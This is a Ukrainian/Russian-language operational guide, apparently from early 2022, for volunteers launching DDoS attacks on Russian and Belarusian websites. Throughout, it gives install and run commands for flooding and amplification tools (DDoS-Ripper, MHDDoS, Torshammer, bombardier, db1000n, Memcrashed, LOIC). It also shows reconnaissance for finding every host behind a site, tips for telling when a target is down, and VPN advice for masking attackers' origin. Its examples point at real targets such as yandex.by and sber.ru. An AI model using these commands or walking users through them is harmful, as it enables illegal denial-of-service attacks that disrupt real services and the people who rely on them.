Для користувачів без Docker-a, Python-a але принаймні з Tor Browser-ом
- https://help-ukraine-win.notion.site/0e4adedbbb5b49d1ac6b4dc53b020d01
- => https://help-ukraine-win.com/ (UA Cyber SHIELD програмка для Windows, MacOS) by https://t.me/incourse911. GutHub repo - https://github.com/opengs/uashield
- аналог https://stop-russian-desinformation.near.page
- аналог https://the-list.ams3.cdn.digitaloceanspaces.com/index.html
- Інструкція щодо ДДоС-атаки для чайників by unknown
- Туторіал по DDoS by tarahtino
- Инструкция по DDOS атакам by zhashkevych
- Подробная инструкция как помочь с DDOS атаками на русские сайты
- Гайд для тих хто вміє із терміналом (gcloud cli)
- Украинские айтишники устраивают DDoS-атаки на российские сайты: помочь может каждый
ping команда з терміналу
Коли пінгуєте сайт вказуючи хост, то команда показує ІП адресу:
$ ping yandex.by
PING yandex.by (5.255.255.5): 56 data bytes
64 bytes from 5.255.255.5: icmp_seq=0 ttl=54 time=95.425 ms
64 bytes from 5.255.255.5: icmp_seq=1 ttl=54 time=95.108 ms
64 bytes from 5.255.255.5: icmp_seq=2 ttl=54 time=91.450 ms
шкода але навпаки команда не працює.
nslookup команда з терміналу
$ nslookup yandex.by
Server: 10.140.0.1
Address: 10.140.0.1#53
$ nslookup yandex.by
5.255.255.5
77.88.55.55
5.255.255.55
77.88.55.66
traceroute (Unix+) tracert (Windows) команда з терміналу
$ traceroute yandex.by
traceroute: Warning: yandex.by has multiple addresses; using 5.255.255.5
traceroute to yandex.by (5.255.255.5), 64 hops max, 52 byte packets
1 * * *
2 37.***.158.49 (37.***.***.49) 53.406 ms 46.406 ms 47.731 ms
3 irb-***.m247.com (8***2) 168.502 ms 76.052 ms 64.302 ms
4 xe-2-&****m247.com (19****0) 48.290 ms
21***02 (21***2) 48.915 ms
xe-***.com (19***50) 46.582 ms
5 5-1-****.net (21***9) 45.973 ms 51.110 ms
xe***3.net (21***3) 52.320 ms
6 ae****l3.net (4.****2) 89.060 ms 89.204 ms 91.235 ms
7 s0***et.net (2****4) 88.511 ms 88.434 ms 89.285 ms
8 * ma****et (93*****1) 97.394 ms *
9 yandex.ru (5.255.255.5) 95.585 ms * 98.014 ms
До речі команда трасування якісно показує, що DDoS-ити yandex.by не дуже ефективно, бо фактично контент витягуєтсья з yandex.ru. Хоча так, можуть бути репліки на білоруських серверах, тому...
Варіант 1 - з сайту DNS lookup
- https://dnschecker.org/all-dns-records-of-domain.php
yandex.by=>93.158.134.1, 213.180.193.1 - https://who.is/dns/
Варіант 2 - dig команда з терміналу
Приклад:
$ dig +short ns yandex.by
ns2.yandex.net.
ns1.yandex.net.
$ dig +short a ns2.yandex.net
93.158.134.1
$ dig +short a ns1.yandex.net
213.180.193.1
- https://who.is/whois-ip/ip-address/91.149.180.89 =>
tbd - https://dnslytics.com/ip/91.149.180.89 =>
ticketbus.by - https://who.is/whois-ip/ip-address/91.149.180.89
Так як один сайт тільки по домену за собою може мати багато хостів (репліки, лоад балансінг), тому "завалити" сайт, значить завалити всі його хости по ІП адресах. Простий ping gazeta.ru або навіть ping gazeta.ru -s 2048 показує ІП адресу 81.19.72.5. Але наступного разу, ІП адреса вже може бути інша ping gazeta.ru => PING gazeta.ru (81.19.72.2): 56 data bytes а ІП адрес є аж 6 (81.19.72.0 - 81.19.72.5). Можна додати -c 10 якщо треба тільки 10 запитів або/і -s 2048 для розміру пакету).
- https://2ip.ua/ua/services/ip-service/ping-traceroute - дуже подібний до простого
ping-a - https://port.ping.pe
- https://check-host.net
- https://www.host-tracker.com/ic/3/2a431baf-8277-4b38-ada8-1c8e205872e0
- https://www.uptrends.com/tools/uptime (IT Army of Ukraine використовує провірки)
- https://viewdns.info/
https://github.com/WhiteHeal/russianshiptfuckoff/
Логін і пароль можна взнати в автора, який є в цій Телеграмі групі КІБЕРВОЯКИ - треба буде зайдіть, спитайте, він вам відпише. В цілях безпеки імя та прізвище його не пишу.
(треба VPN)
https://github.com/palahsu/DDoS-Ripper
git clone https://github.com/palahsu/DDoS-Ripper.git
cd DDoS-Ripper
python3 DRipper.py -s IP_or_HOST -p PORT
Notes:
-t 135ПИСАТИ НЕ ТРЕБА, тому що по замовчуванню турбо режим вже включаєтсья з показником 135. Питання тільки в тому при яких умовах він включається в 443 і навіщо. АЛЕ ПИСАТИ ТРЕБА ТОДІ, коли треба більше threads --t 999або-t 12345буде переказано скрипту для більшого значення потоків.-qце тихий режим, хоча що з ним що без нього логи все одно виводяться.10000часто прописують цифру в кінці, але вона скриптом не очікується, не опрацьовується. Хелп інфо скрипта не вказує про "вільний параметр".- Якщо більшість логів червоні і жодного зеленого вже не проскакує, то ПОТЕНЦІЙНО сайт вже впав. В такому разі бажано провірити як мінімум пінгом, як максимум вище вказаними сайтами, або якось інакше. І якщо пінг показує, що ще є НЕ добиті хости, тоді перезагрузити команду. Коли ж команда взагалі не запустилась, і ви бачите хелп інфо, тоді ймовірно ваше ІП ваше (через VPN) заблоковане або не доступне. В таких випадках треба переключатись на ІП Росії. Аналогічно, якщо вже дуже багато червоних і ви наприклад маєте ІП Швейцарії, то варто спробувати переключитись на іншу ІП і спробувати атаку знову.
АКТУАЛЬНІ ПИТАННЯ:
- Треба нормально заінсталити і запустити (бо докер тут ставиться через
cask)
(треба VPN)
https://github.com/MHProDev/MHDDoS
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip3 install -r requirements.txt
python3 start.py udp IP:PORT 1000 3600
Examples:
python3 start.py udp 185.157.96.130 4 1000
python3 start.py udp 185.157.96.130:53 4 1000
python3 start.py udp 185.157.96.130:443 4 1000
Норм якщо ви бачите "Attack Started !"
Notes:
- Працює ТІЛЬКИ з ІП адресою !!!
- Не запускається (еррори), коли на той самий ІП йде атака також через
DRipper.py(інший Python процес)
(треба VPN)
for Python 3.x
1.0 Beta version is published on SourceForge and seems to be in [SVN](svn checkout https://svn.code.sf.net/p/torshammer/code/trunk torshammer-code) since 2012.
Download manually from https://sourceforge.net/projects/torshammer/
or
wget https://iweb.dl.sourceforge.net/project/torshammer/Torshammer/1.0/Torshammer%201.0.zip
unzip Torshammer\ 1.0.zip
cd Torshammer\ 1.0
Приклади:
# shortest format - default: port 80, threads: 256
./torshammer.py --target yandex.by
# short format
./torshammer.py -t yandex.by -p 443 -r 1024
# long format
./torshammer.py --target yandex.by --port 443 --threads 1024
Notes:
- Yes, file
./torshammer.pyis executable (it is after downloading so (a+x)). Ctrl + Cдовго виходить з процесу. Щоб вийти з процесу швидше требаCtrl + Z.- Норм коли пише Posting: щось там... і connected to host...
Or read more here and do:
for Python 2.x
git clone https://github.com/dotfighter/torshammer.git
python torshammer.py -t yandex.by
Last changes were by https://github.com/nitupkcuf/runner but then repo DELETED or changed to PRIVATE, but there is https://github.com/nanabanano/runner which seems to be INITIAL repo and https://github.com/AndrewEastwood/runner which seems to be the LATEST with code changes. Soon might be new version of container. TODO - observe.
brew install --cask docker
docker run --rm -it nitupkcuf/ddos-ripper:latest {HOSTNAME | IP}
(треба VPN)
docker run -ti --rm alpine/bombardier -c 10000 -d 3600s -l IP_or_HOST # 80 port by default
docker run -ti --rm alpine/bombardier -c 10000 -d 3600s -l IP_or_HOST:PORT
docker run -ti --rm alpine/bombardier -c 10000 -d 3600s -l IP_or_HOST:PORT/UDP
docker run -ti --rm alpine/bombardier -c 10000 -d 3600s -l IP_or_HOST:PORT/TCP
Note. Спочатку на 3s, щоб взнати чи взагалі реквести йдуть. А потім виставляти 3600s або більше. Але я так НЕ роблю суто бо спішу. Тому я дивлюсь progress bar - якщо там почало "сунутись" і ТОЧНО пише Bombarding... то значить ОК. Якщо ні, то я зупиняю скрипт.
АКТУАЛЬНІ ПИТАННЯ:
- так треба
/UDPчи/TCPдля портів 22 чи 53 в кінці? Чи можна міксувати протоколи і порти з цими суфіксами? Чому люди міксують? - І взагалі пишуть, що bombardier не працює з TCP/UDP. Треба провірити хелп.
Docker метод 2 (треба VPN) - TBD
By devs from Telegram channel DDOS по країні СЕПАРІВ
It’s an application for coordinated ddos attacks on infrastrcture of ocuppants. Main advantage of this method is that everything users need to do to start ddosing, just start the application on PC, all the coordination and settings, will be done by admins with support of proffesionals from cybersecurity.
Instruction on how to use application and all needed informations can be found on Google sheets.
GitHub repo - https://github.com/Arriven/db1000n
Docker Example:
docker run --rm -it ghcr.io/arriven/db1000n:latest sber.ru
Memcrashed Python + Docker
https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/ https://github.com/649/Memcrashed-DDoS-Exploit
git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
cd Memcrashed-DDoS-Exploit
echo "SHODAN_KEY" > api.txt
docker build -t memcrashed .
docker run -it memcrashed
Але вимагає ключа для Schodan АПІ => https://www.shodan.io/
АКТУАЛЬНІ ПИТАННЯ:
- Якось отримати ключ і спробувати. Може має сенс.
NOT VERIFIED !!!
- https://github.com/abila5h/Cyphon-DoS
- https://github.com/H4CK3ROFF/DDOS-NO-WAR
- https://github.com/p-butovets/fake-ddos-hammer
- https://github.com/AlexTrushkovsky/NoWarDDoS
- https://github.com/WhiteHeal/autodos
Інструкція як автоматично скаржитись на хуйловські телеграм-канали - https://github.com/ftishko/de_d-mosk_l
via Docker
docker build -t de_d-mosk_l .
torsocks docker run --rm -it de_d-mosk_l - якщо встановлено тор
docker run —rm -it de_d-mosk_l
via Python 3
git clone https://github.com/ftishko/de_d-mosk_l.git
cd de_d-mosk_l
pip3 install -r requirements.txt
python3 runner.py
# win
pip install -r requirements.txt
python runner.py
LOIC / HOIC GitHub - NewEraCracker/LOIC: Low Orbit Ion Cannon - An open source network stress tool, written in C#. Based on Praetox's LOIC project.
LOIC
HOIC
Пінг по колу (Go Lang)
З 🇷🇺 серверами:
- UrbanVPN — безкоштовний (але пишуть що "сливает данные")
- Avira Phantom VPN — безкоштовний
- ProtonVPN — є безкоштовна версія (але пишуть в Телеграмі, що є баги)
- CyberGhost VPN — платний, але 96 серверів в росії
- Windscribe - безплатна версія, при умові подання емейлу при реєстрації дає перших безплатних 10 ГБ трафіку (без емейла 2 ГБ). Росія в списку є, але не підключається.
- HotSpot Shield
- CyberGhost VPN
- https://www.dewvpn.com/
- https://hide.me/en/
Без 🇷🇺 серверів:
- ClearVPN — безкоштовний за промокодом
SAVEUKRAINE. Вводити тут. Quote from Telegram channel DDOS по країні СЕПАРІВ
Інфовоїни! Для наших бешкецтв потрібний надійний захист. Наші друзі з MacPaw дають промокод на ClearVPN, користуйтесь на здоров'я.
Infowarriors! Our riots need reliable protection. Our friends from MacPaw give a promo code on ClearVPN, enjoy.
https://my.clearvpn.com/promo/redeem?code=SAVEUKRAINE
Треба зареєструватись, і вже тоді собі скачати програму для вашої ОС. Код діє до 2023го року тільки. Росія в списку є, але в більшості випадків НЕ переключаєтсья. IMHO, не зручний "переключатор країн", адже треба Деактивувати спочатку, потім ІП адреса стає ваша звичайна, потім Активувати, програмка підключає і міняє ІП адресу, що є відносно але довго в секундах. ExpressVPN по відчуттях переключає моментально.
- F‑Secure FREEDOME VPN — безкоштовно на 5 днів
- fogu Pro — безкоштовний на IOS
Інші:
- NordVPN https://nordvpn.com/
- Psiphon https://psiphon.ca/en/download.html?psiphonca
- SurfShark https://surfshark.com/deal/influencer?coupon=NETSTALKERS (увага - лінк з купоном)
- https://www.vpngate.net
- https://www.freeopenvpn.org
- https://us.ovh.com
- https://ghostpath.com/servers/city/Frankfurt
VPN для Android
- Secure VPN https://play.google.com/store/apps/details?id=com.fast.free.unblock.secure.vpn&hl=en_US&gl=US
PS. Maintained by @Andrii-L-DDoSer